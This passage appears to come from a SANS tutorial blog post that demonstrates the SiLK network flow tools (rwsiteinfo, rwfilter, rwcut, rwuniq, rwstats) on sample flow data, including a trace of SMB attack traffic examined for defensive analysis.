<span style="color: white;">libsilk-libs: -L/usr/local/lib -lsilk -lz -lm</span>
<span style="color: white;">libsilk-thrd-libs: -L/usr/local/lib -lsilk-thrd -lsilk -lz -lm</span>
<span style="color: white;">libflowsource-libs: -L/usr/local/lib -lflowsource -lsilk-thrd -lsilk -L/usr/local/lib -lfixbuf -lpthread -lgthread-2.0 -pthread -lglib-2.0 -lz -lm</span>
<span style="color: white;">data-rootdir: /data</span>
<span style="color: white;">python-site-dir: /usr/lib/python3/dist-packages</span>
</pre></td></tr></tbody></table></div>
</div><p>Get information about the sensors in the site via <i><b>rwsiteinfo</b></i>.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~$ </span><b><span style="color: #fcff01;">rwsiteinfo --fields sensor,describe-sensor</span></b></span>
<span style="color: white;"> Sensor| Sensor-Description|</span>
<span style="color: white;"> Internal| Backbone ERS|</span>
<span style="color: white;">Perimeter| Perimeter collector|</span>
<span style="color: white;"> ERS|Avaya ERS Switch Stack|</span>
<span style="color: white;"> internal| STIFortunes|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>A different view of the sensors information</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~$ </span><b><span style="color: #fcff01;">rwsiteinfo --fields=sensor:list</span></b></span>
<span style="color: white;"> Sensor:list|</span>
<span style="color: white;">Internal,Perimeter,ERS,internal|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Get information from a particular sensor via <i><b>rwsiteinfo</b></i>.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~$ </span><b><span style="color: #fcff01;">rwsiteinfo --sensor=Internal --fields type,repo-file-count,repo-start-date,repo-end-date</span></b></span>
<span style="color: white;"> Type|File-Count| Start-Date| End-Date|</span>
<span style="color: white;"> in| 5828|2018/10/01T17:00:00|2022/07/03T19:00:00|</span>
<span style="color: white;"> out| 5093|2018/10/01T01:00:00|2022/07/03T19:00:00|</span>
<span style="color: white;"> inweb| 5059|2018/10/04T22:00:00|2022/07/03T19:00:00|</span>
<span style="color: white;"> outweb| 1781|2018/10/03T08:00:00|2019/05/03T14:00:00|</span>
<span style="color: white;"> ...</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Get information on <i>classes, types</i> and their <i>default </i>values. The "<code style="background-color: white; font-size: 14px;">+"</code><span style="background-color: white; font-family: Arial, "sans-serif"; font-size: 14px;"> mark rows for the default class and "</span><code style="background-color: white; font-size: 14px;">*"</code><span style="background-color: white; font-family: Arial, "sans-serif"; font-size: 14px;"> mark rows for a default type</span></p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwsiteinfo --sensor=Perimeter --fields class,type,mark-default</span></b></span>
<span style="color: white;">Class| Type|Defaults|</span>
<span style="color: white;"> all| in| +*|</span>
<span style="color: white;"> all| out| +*|</span>
<span style="color: white;"> all| inweb| +*|</span>
<span style="color: white;"> all| outweb| +*|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Get the start and end date of the repo.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwsiteinfo --fields=repo-start,repo-end</span></b></span>
<span style="color: white;"> Start-Date| End-Date|</span>
<span style="color: white;">2018/10/01T01:00:00|2022/07/03T19:00:00|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Leverage <b><i>rwcount</i></b>, to count the number of flow records, their bytes and packets.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwcount /tmp/attack-trace.rw</span></b></span>
<span style="color: white;"> Date| Records| Bytes| Packets|</span>
<span style="color: white;">2019/04/20T03:28:00| 2.60| 2218.09| 16.36|</span>
<span style="color: white;">2019/04/20T03:28:30| 9.40| 176342.91| 331.64|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Leverage <b><i>rwfilter</i></b>, to retrieve information based on start and end date for all IP protocols relating to all traffic types and specifically for the host with address <i>8.8.8.8</i>. Match on the first successful 100 records and save those to a file named <i>8.rw</i>.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start=2022/01/05 --end=2022/07/01T23 --protocol=0- \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--type=all --any-address=8.8.8.8 </span></b></span><b><span style="color: #fcff01;">--max-pass=100 --pass=8.rw</span></b></pre></td></tr></tbody></table></div>
<p></p><p>Get information on the <i>8.rw </i>file.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10
11
12
13
14</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfileinfo 8.rw</span></b></span>
<span style="color: white;">8.rw:</span>
<span style="color: white;"> format(id) FT_RWIPV6ROUTING(0x0c)</span>
<span style="color: white;"> version 16</span>
<span style="color: white;"> byte-order littleEndian</span>
<span style="color: white;"> compression(id) none(0)</span>
<span style="color: white;"> header-length 176</span>
<span style="color: white;"> record-length 88</span>
<span style="color: white;"> record-version 1</span>
<span style="color: white;"> silk-version 3.19.2</span>
<span style="color: white;"> count-records 100</span>
<span style="color: white;"> file-size 8976</span>
<span style="color: white;"> command-lines</span>
<span style="color: white;"> 1 rwfilter --start=2022/01/05 --end=2022/07/01T23 --protocol=0- --type=all --any-address=8.8.8.8 --max-pass=100 --pass=8.rw</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Accessing the file just saved, by using the <b><i>rwcut</i></b> tool, while view a few fields.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwcut 8.rw --fields sip,sPort,dIP,dPort</span><span style="color: white;"> </span></b></span>
<span style="color: white;"> sIP|sPort| dIP|dPort|</span>
<span style="color: white;"> 8.8.8.8| 53| 172.28.10.137|56213|</span>
<span style="color: white;"> 8.8.8.8| 53| 172.28.10.137|55171|</span>
<span style="color: white;"> 8.8.8.8| 53| 172.28.10.137|54512|</span>
<span style="color: white;"> ....</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Confirming the number of records in the file <i>8.rw</i>.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwcut 8.rw --no-title | wc --line</span></b><b><span style="color: #fcff01;">s</span></b></span><b><span style="color: #fcff01;">
<span>100</span>
</span></b></pre></td></tr></tbody></table></div>
<p></p><p>Using <b><i>rwcut</i></b>, to get more details from a flow file named <i>attack-trace.rw</i>.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwcut attack-trace.rw --fields=sIP,sPort,dIP,dPort,bytes,stime --num-recs=2</span></b></span>
<span style="color: white;"> sIP|sPort| dIP|dPort| bytes| sTime|</span>
<span style="color: white;"> 98.114.205.102| 1821| 192.150.11.111| 445| 168|2019/04/20T03:28:28.374|</span>
<span style="color: white;"> 192.150.11.111| 445| 98.114.205.102| 1821| 128|2019/04/20T03:28:28.375|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Removing the space to the left with <i>ipv6=policy-ignore</i>. We could have also set the environment variable <i>SILK_IPV6_POLICY=ignore.</i></p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwcut attack-trace.rw --fields=sIP,sPort,dIP,dPort,bytes,stime --num-recs=2 --ipv6-policy=ignore</span></b></span>
<span style="color: white;"> sIP|sPort| dIP|dPort| bytes| sTime|</span>
<span style="color: white;"> 98.114.205.102| 1821| 192.150.11.111| 445| 168|2019/04/20T03:28:28.374|</span>
<span style="color: white;"> 192.150.11.111| 445| 98.114.205.102| 1821| 128|2019/04/20T03:28:28.375|</span>
</pre></td></tr></tbody></table></div>
<p></p><p><b><i>rwcut</i></b> can be used without specifying fields. In the example below, it shows 12 fields by default.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start=2022/01/05 --end=2022/07/01T23 --protocol=0- --type=all --any-address=8.8.8.8 --max-pass=100 --pass=stdout | rwcut --num-recs=2</span></b></span>
<span style="color: white;"> sIP| dIP|sPort|dPort|pro| packets| bytes| flags| sTime| duration| eTime| sensor|</span>
<span style="color: white;"> 8.8.8.8| 172.28.10.137| 53|56213| 17| 1| 218| |2022/02/08T14:26:40.723| 0.001|2022/02/08T14:26:40.724| Internal|</span>
<span style="color: white;"> 8.8.8.8| 172.28.10.137| 53|55171| 17| 1| 102| |2022/02/08T14:27:10.329| 0.013|2022/02/08T14:27:10.342| Internal|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Using <b><i>rwcut</i></b>, to get a CSV file from the retrieved data. Maybe you want to get this data in your machine learning algorithms, something we teach in the <a href="https://www.sans.org/cyber-security-courses/applied-data-science-machine-learning/" target="_blank">SANS SEC595: Applied Data Science and AI/Machine Learning for Cybersecurity Professionals</a> or maybe you would like to import them into Pandas or Excel.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwcut attack-trace.rw --fields=sIP,sPort,dIP,dPort,bytes,stime \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--num-recs=2 --ipv6-policy=ignore --no-columns --delimited=, --no-final-delimiter</span></b></span>
<span style="color: white;">sIP,sPort,dIP,dPort,bytes,sTime</span>
<span style="color: white;">98.114.205.102,1821,192.150.11.111,445,168,2019/04/20T03:28:28.374</span>
<span style="color: white;">192.150.11.111,445,98.114.205.102,1821,128,2019/04/20T03:28:28.375</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Get information on a particular <i>bytes-range</i>.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start=2022/01/05T0 --end=2022/07/01 --protocol=0- --pass=stdout --type=all --bytes=0-30 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--max-pass=5</span></b><span style="color: white;"> |</span> </span><span><b><span style="color: #fcff01;">rwuniq --fields=sIP,dIP,bytes,packets</span></b></span>
<span style="color: white;"> sIP| dIP| bytes| packets| Records|</span>
<span style="color: white;"> 10.200.223.7| 172.28.10.1| 28| 1| 1|</span>
<span style="color: white;"> 10.200.223.7| 172.28.20.1| 28| 1| 1|</span>
<span style="color: white;"> 10.200.223.7| 172.28.1.1| 28| 1| 1|</span>
<span style="color: white;"> 10.200.223.7| 172.28.30.64| 28| 1| 1|</span>
<span style="color: white;"> 10.200.223.7| 172.28.30.65| 28| 1| 1|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Group data in 24 hours bin/buckets</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start=2022/01/05T0 --end=2022/07/01 --protocol=0- \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--pass=stdout --type=all --bytes=0-30 | rwuniq --bin-time=86400 --fields stime,type \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--values=records --sort-output</span></b></span>
<span style="color: white;"> sTime| type| Records|</span>
<span style="color: white;">2022/02/12T00:00:00| in| 4136|</span>
<span style="color: white;">2022/02/12T00:00:00| out| 52|</span>
<span style="color: white;">2022/02/13T00:00:00| in| 2469|</span>
<span style="color: white;">2022/02/14T00:00:00| in| 4307|</span>
<span style="color: white;">2022/02/14T00:00:00| out| 7|</span>
<span style="color: white;">...</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Grouping data in 1 hour bins/buckets.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start=2022/01/05T0 --end=2022/07/01 --protocol=0- \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--pass=stdout --type=all --bytes=0-30 | rwuniq --bin-time=3600 --fields stime,type \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--values=records --sort-output</span></b></span>
<span style="color: white;"> sTime| type| Records|</span>
<span style="color: white;">2022/02/12T19:00:00| in| 2|</span>
<span style="color: white;">2022/02/12T20:00:00| in| 3674|</span>
<span style="color: white;">2022/02/12T20:00:00| out| 52|</span>
<span style="color: white;">2022/02/12T21:00:00| in| 14|</span>
<span style="color: white;">2022/02/12T22:00:00| in| 446|</span>
<span style="color: white;">....</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Get the number of bytes within the hours.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10
11</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start=2022/01/05T0 --end=2022/07/01 --protocol=0- \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--pass=stdout --type=all --bytes=0-30 | rwuniq --bin-time=86400 --fields stime,type \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--values=bytes --sort-output | head --lines=10</span></b></span><b style="color: #fcff01;">
</b><span><b style="color: #fcff01;"> </b><span style="color: white;"> sTime| type| Bytes|</span></span><span style="color: white;">
<span>2022/02/12T00:00:00| in| 115808|</span>
<span>2022/02/12T00:00:00| out| 1456|</span>
<span>2022/02/13T00:00:00| in| 69132|</span>
<span>2022/02/14T00:00:00| in| 120596|</span>
<span>2022/02/14T00:00:00| out| 196|</span>
<span>2022/02/16T00:00:00| out| 120|</span>
<span>2022/02/17T00:00:00| in| 5527373|</span>
<span>2022/02/17T00:00:00| out| 882|</span>
<span>2022/02/18T00:00:00| in| 29|</span></span><b style="color: #fcff01;">
</b></pre></td></tr></tbody></table></div>
<p></p><p>Extending further, grabbing the count of the distinct source and destination IPs.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10
11</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start=2022/01/05T0 --end=2022/07/01 --protocol=0- --pass=stdout \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--type=all --bytes=0-30 | rwuniq --bin-time=86400 --fields stime,type --values=bytes,sip,dip \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--sort-output | head --lines=10</span></b></span>
<span style="color: white;"> sTime| type| Bytes| sIP-Distinct| dIP-Distinct|</span>
<span style="color: white;">2022/02/12T00:00:00| in| 115808| 2| 3268|</span>
<span style="color: white;">2022/02/12T00:00:00| out| 1456| 1| 1|</span>
<span style="color: white;">2022/02/13T00:00:00| in| 69132| 1| 2387|</span>
<span style="color: white;">2022/02/14T00:00:00| in| 120596| 1| 4199|</span>
<span style="color: white;">2022/02/14T00:00:00| out| 196| 7| 1|</span>
<span style="color: white;">2022/02/16T00:00:00| out| 120| 1| 4|</span>
<span style="color: white;">2022/02/17T00:00:00| in| 5527373| 3| 13|</span>
<span style="color: white;">2022/02/17T00:00:00| out| 882| 7| 21|</span>
<span style="color: white;">2022/02/18T00:00:00| in| 29| 1| 1|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>By default <i><b>rwuniq</b></i> has a value of <i>records</i>, ie <i>--value=records</i>. This represents which values are counted in the bin.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwuniq attack-trace.rw --fields sIP</span></b></span>
<span style="color: white;"> sIP| Records|</span>
<span style="color: white;"> 192.150.11.111| 6|</span>
<span style="color: white;"> 98.114.205.102| 6|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Above is the same as <i>--value=records</i> means the records are counted in the bin.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwuniq attack-trace.rw --fields sIP --values=records</span></b></span>
<span style="color: white;"> sIP| Records|</span>
<span style="color: white;"> 192.150.11.111| 6|</span>
<span style="color: white;"> 98.114.205.102| 6|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Expand <b>rwuniq</b> to extract the <i>stime </i>and <i>source IP </i>fields. Group by the bytes and sort the output.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwuniq attack-trace.rw --fields stime,sip --values=bytes --sort-output --bin-time=600</span></b></span>
<span style="color: white;"> sTime| sIP| Bytes|</span>
<span style="color: white;">2019/04/20T03:20:00| 98.114.205.102| 171264|</span>
<span style="color: white;">2019/04/20T03:20:00| 192.150.11.111| 7297|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Group by packets with a bin size of 10 minutes</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwuniq attack-trace.rw --fields stime,sip --values=packets \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--sort-output --bin-time=600</span></b></span>
<span style="color: white;"> sTime| sIP| Packets|</span>
<span style="color: white;">2019/04/20T03:20:00| 98.114.205.102| 195|</span>
<span style="color: white;">2019/04/20T03:20:00| 192.150.11.111| 153|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Group by both packets and bytes</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwuniq attack-trace.rw --fields stime,sip --values=bytes,packets --sort-output --bin-time=600</span></b></span>
<span style="color: white;"> sTime| sIP| Bytes| Packets|</span>
<span style="color: white;">2019/04/20T03:20:00| 98.114.205.102| 171264| 195|</span>
<span style="color: white;">2019/04/20T03:20:00| 192.150.11.111| 7297| 153|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Assuming the input has been sorted, we can pass<i> --presorted-input</i> to the <b>rwuiq</b> command.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwuniq attack-trace.rw --fields sip,stime --values=bytes,packets --presorted-input --bin-time=600</span></b></span>
<span style="color: white;"> sIP| sTime| Bytes| Packets|</span>
<span style="color: white;"> 98.114.205.102|2019/04/20T03:20:00| 168| 4|</span>
<span style="color: white;"> 192.150.11.111|2019/04/20T03:20:00| 128| 3|</span>
<span style="color: white;"> 98.114.205.102|2019/04/20T03:20:00| 4777| 14|</span>
<span style="color: white;"> 192.150.11.111|2019/04/20T03:20:00| 1590| 17|</span>
<span style="color: white;"> ...</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Once again, use <i>--ipv6-policy=true</i> to remove the space on the left.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwuniq attack-trace.rw --fields sip,stime --values=bytes,packets \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--presorted-input --bin-time=600 --ipv6-policy=ign</span></b></span><b><span style="color: #fcff01;"><span>ore</span></span></b>
<span style="color: white;"> sIP| sTime| Bytes| Packets|</span>
<span style="color: white;"> 98.114.205.102|2019/04/20T03:20:00| 168| 4|</span>
<span style="color: white;"> 192.150.11.111|2019/04/20T03:20:00| 128| 3|</span>
<span style="color: white;"> 98.114.205.102|2019/04/20T03:20:00| 4777| 14|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Finding the most commonly used protocols with <b><i>rwstats</i></b>.<br /><b><i>rwstats</i></b> group records into time bin either by field or fields.<br /><b><i>rwstats</i></b> can count the top N and lower N number of bins. <b>rwuniq</b> cannot do this.<br /><b><i>rwstats</i></b> can also compute summary percentage.</p><p>Find the top 10 protocols in a 10 minute span.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwstats attack-trace.rw --fields=protocol,stime \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--count=10 --bin-time=600 --values=bytes</span></b></span>
<span style="color: white;">INPUT: 12 Records for 1 Bin and 178561 Total Bytes</span>
<span style="color: white;">OUTPUT: Top 10 Bins by Bytes</span>
<span style="color: white;">pro| sTime| Bytes| %Bytes| cumul_%|</span>
<span style="color: white;"> 6|2019/04/20T03:20:00| 178561|100.000000|100.000000|</span>
</pre></td></tr></tbody></table></div>
